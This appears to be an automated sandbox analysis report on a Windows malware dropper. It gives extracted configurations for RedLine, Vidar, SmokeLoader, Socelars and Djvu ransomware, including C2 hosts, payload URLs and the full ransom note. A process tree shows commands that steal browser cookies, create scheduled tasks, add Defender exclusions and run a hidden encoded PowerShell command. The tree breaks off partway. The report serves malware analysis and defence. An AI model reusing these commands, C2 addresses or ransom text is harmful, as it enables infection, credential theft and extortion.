Analysis

  • max time kernel
    71s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    14-03-2022 05:19

General

  • Target

    cef4bcb66958435d6a639cffe3b7ae864b4683e891b0479ad08bd7eec6e2595a.exe

  • Size

    3.6MB

  • MD5

    6cddff5ae21bcf78ed58ca2d4fa0ab41

  • SHA1

    8aeaadd6b1f4a2b666aa6c21c7a5d97111f3109d

  • SHA256

    cef4bcb66958435d6a639cffe3b7ae864b4683e891b0479ad08bd7eec6e2595a

  • SHA512

    7f6ee1b464a321bfea992fe37a7e671c85dba83b89e9ef2237ba47b2d364d33f9dc28c907f9c3f2c7524088632e596a65d4dba8509ce2104cdbe99076a1aefc4

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

ANINEWONE

C2

zisiarenal.xyz:80

Extracted

Family

vidar

Version

39.9

Botnet

706

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 45 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 30 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cef4bcb66958435d6a639cffe3b7ae864b4683e891b0479ad08bd7eec6e2595a.exe
    "C:\Users\Admin\AppData\Local\Temp\cef4bcb66958435d6a639cffe3b7ae864b4683e891b0479ad08bd7eec6e2595a.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1412
        • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.exe
          zaiqa_1.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.exe" -a
            5⤵
            • Executes dropped EXE
            PID:2388
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_2.exe
          zaiqa_2.exe
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:4612
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4680
        • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_3.exe
          zaiqa_3.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:4484
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_9.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4520
        • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_9.exe
          zaiqa_9.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:4072
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:3620
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:424
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:4836
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:1052
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:2624
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:3200
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            5⤵
            • Executes dropped EXE
            PID:2500
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_8.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4528
        • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_8.exe
          zaiqa_8.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4732
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            5⤵
              PID:3936
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                6⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c zaiqa_7.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4488
          • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_7.exe
            zaiqa_7.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:1432
            • C:\Users\Admin\Documents\5F4ij7CdEJj2miOHXC_2LJYC.exe
              "C:\Users\Admin\Documents\5F4ij7CdEJj2miOHXC_2LJYC.exe"
              5⤵
                PID:228
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                  6⤵
                  • Creates scheduled task(s)
                  PID:4736
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                  6⤵
                  • Creates scheduled task(s)
                  PID:2140
                • C:\Users\Admin\Documents\HAAl4VjMSeAZskLAvAoZQAph.exe
                  "C:\Users\Admin\Documents\HAAl4VjMSeAZskLAvAoZQAph.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4572
                  • C:\Users\Admin\Pictures\Adobe Films\h1J8Z8ar1uNyZ5O8xjmC43dH.exe
                    "C:\Users\Admin\Pictures\Adobe Films\h1J8Z8ar1uNyZ5O8xjmC43dH.exe"
                    7⤵
                      PID:3964
                    • C:\Users\Admin\Pictures\Adobe Films\d3MDqU3cDOT5kd_UERnzzdGw.exe
                      "C:\Users\Admin\Pictures\Adobe Films\d3MDqU3cDOT5kd_UERnzzdGw.exe"
                      7⤵
                        PID:5000
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 616
                          8⤵
                          • Program crash
                          PID:2216
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 624
                          8⤵
                          • Program crash
                          PID:3384
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 616
                          8⤵
                          • Program crash
                          PID:4872
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 772
                          8⤵
                          • Program crash
                          PID:5860
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 748
                          8⤵
                          • Program crash
                          PID:844
                      • C:\Users\Admin\Pictures\Adobe Films\a3HsF5fIEBOzyp3CAmIInZxX.exe
                        "C:\Users\Admin\Pictures\Adobe Films\a3HsF5fIEBOzyp3CAmIInZxX.exe"
                        7⤵
                          PID:2424
                          • C:\Windows\SysWOW64\control.exe
                            "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                            8⤵
                              PID:2816
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                9⤵
                                  PID:3808
                            • C:\Users\Admin\Pictures\Adobe Films\fQu4iaLNyv_FofSIYlcRGGus.exe
                              "C:\Users\Admin\Pictures\Adobe Films\fQu4iaLNyv_FofSIYlcRGGus.exe"
                              7⤵
                                PID:528
                                • C:\Users\Admin\AppData\Local\Temp\7zS87F5.tmp\Install.exe
                                  .\Install.exe
                                  8⤵
                                    PID:3640
                                    • C:\Users\Admin\AppData\Local\Temp\7zSADBD.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      9⤵
                                        PID:3292
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                          10⤵
                                            PID:5272
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                              11⤵
                                                PID:3720
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                  12⤵
                                                    PID:5076
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                    12⤵
                                                      PID:4036
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                  10⤵
                                                    PID:3784
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                      11⤵
                                                        PID:5680
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                          12⤵
                                                            PID:5416
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                            12⤵
                                                              PID:3620
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "ggdgzLOfm" /SC once /ST 01:38:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                          10⤵
                                                          • Creates scheduled task(s)
                                                          PID:4672
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /run /I /tn "ggdgzLOfm"
                                                          10⤵
                                                            PID:5872
                                                    • C:\Users\Admin\Pictures\Adobe Films\AgIqHehKv5SLGqyAMf9_nK9V.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\AgIqHehKv5SLGqyAMf9_nK9V.exe"
                                                      7⤵
                                                        PID:2060
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 952
                                                          8⤵
                                                          • Program crash
                                                          PID:4840
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                          8⤵
                                                            PID:1552
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 960
                                                            8⤵
                                                            • Program crash
                                                            PID:4160
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 988
                                                            8⤵
                                                            • Program crash
                                                            PID:5972
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 980
                                                            8⤵
                                                            • Program crash
                                                            PID:5692
                                                        • C:\Users\Admin\Pictures\Adobe Films\G1IH10PnkGl4ZEw330DEiiHF.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\G1IH10PnkGl4ZEw330DEiiHF.exe"
                                                          7⤵
                                                            PID:1688
                                                          • C:\Users\Admin\Pictures\Adobe Films\QftcqsQzA2Vwlpr5OUnL4AAz.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\QftcqsQzA2Vwlpr5OUnL4AAz.exe"
                                                            7⤵
                                                              PID:2556
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 2556 -s 908
                                                                8⤵
                                                                • Program crash
                                                                PID:4736
                                                            • C:\Users\Admin\Pictures\Adobe Films\zcgPGatiqYraevI2HFcZS6N5.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\zcgPGatiqYraevI2HFcZS6N5.exe"
                                                              7⤵
                                                                PID:2336
                                                                • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
                                                                  8⤵
                                                                    PID:3632
                                                                    • C:\Users\Admin\AppData\Local\Temp\IFD9HG9AAFKD4I2.exe
                                                                      https://iplogger.org/1QuEf7
                                                                      9⤵
                                                                        PID:256
                                                                    • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\ywang.exe"
                                                                      8⤵
                                                                        PID:4428
                                                                        • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\ywang.exe" -h
                                                                          9⤵
                                                                            PID:2848
                                                                        • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                                          8⤵
                                                                            PID:4636
                                                                            • C:\Users\Admin\AppData\Local\Temp\1cf5e93a-3627-475e-a336-fced716af51d.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\1cf5e93a-3627-475e-a336-fced716af51d.exe"
                                                                              9⤵
                                                                                PID:1084
                                                                            • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                                              8⤵
                                                                                PID:5080
                                                                              • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                                                8⤵
                                                                                  PID:1556
                                                                                • C:\Users\Admin\AppData\Local\Temp\pub1.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\pub1.exe"
                                                                                  8⤵
                                                                                    PID:3948
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2hwznovy.wf6.bat""
                                                                                      9⤵
                                                                                        PID:2412
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout 3
                                                                                          10⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5556
                                                                                        • C:\ProgramData\BCleaner Software\BCleaner Software.exe
                                                                                          "C:\ProgramData\BCleaner Software\BCleaner Software.exe"
                                                                                          10⤵
                                                                                            PID:5628
                                                                                          • C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe
                                                                                            "C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe"
                                                                                            10⤵
                                                                                              PID:5992
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
                                                                                          8⤵
                                                                                            PID:3484
                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                            8⤵
                                                                                              PID:360
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-VIIMK.tmp\setup.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-VIIMK.tmp\setup.tmp" /SL5="$4028E,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                9⤵
                                                                                                  PID:4500
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                    10⤵
                                                                                                      PID:5220
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-677R9.tmp\setup.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-677R9.tmp\setup.tmp" /SL5="$50294,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                        11⤵
                                                                                                          PID:5716
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst200.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst200.exe"
                                                                                                    8⤵
                                                                                                      PID:4624
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ip.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ip.exe"
                                                                                                      8⤵
                                                                                                        PID:4716
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                          9⤵
                                                                                                            PID:5772
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS2464.tmp\Install.exe
                                                                                                              .\Install.exe
                                                                                                              10⤵
                                                                                                                PID:6124
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS40A6.tmp\Install.exe
                                                                                                                  .\Install.exe /S /site_id "745794"
                                                                                                                  11⤵
                                                                                                                    PID:5036
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\udontsay.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
                                                                                                              8⤵
                                                                                                                PID:1340
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\temp-working.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\temp-working.exe"
                                                                                                                  9⤵
                                                                                                                    PID:5636
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                                                  8⤵
                                                                                                                    PID:2564
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6ETvvERoVMrgX\Soft848.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6ETvvERoVMrgX\Soft848.exe
                                                                                                                      9⤵
                                                                                                                        PID:5964
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
                                                                                                                      8⤵
                                                                                                                        PID:1416
                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          "C:\Windows\System32\msiexec.exe" -Y .\oWOIuJ.EH
                                                                                                                          9⤵
                                                                                                                            PID:5928
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\anytime1.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
                                                                                                                          8⤵
                                                                                                                            PID:5352
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\anytime2.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
                                                                                                                            8⤵
                                                                                                                              PID:5760
                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 5760 -s 1688
                                                                                                                                9⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4624
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\anytime3.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
                                                                                                                              8⤵
                                                                                                                                PID:6084
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
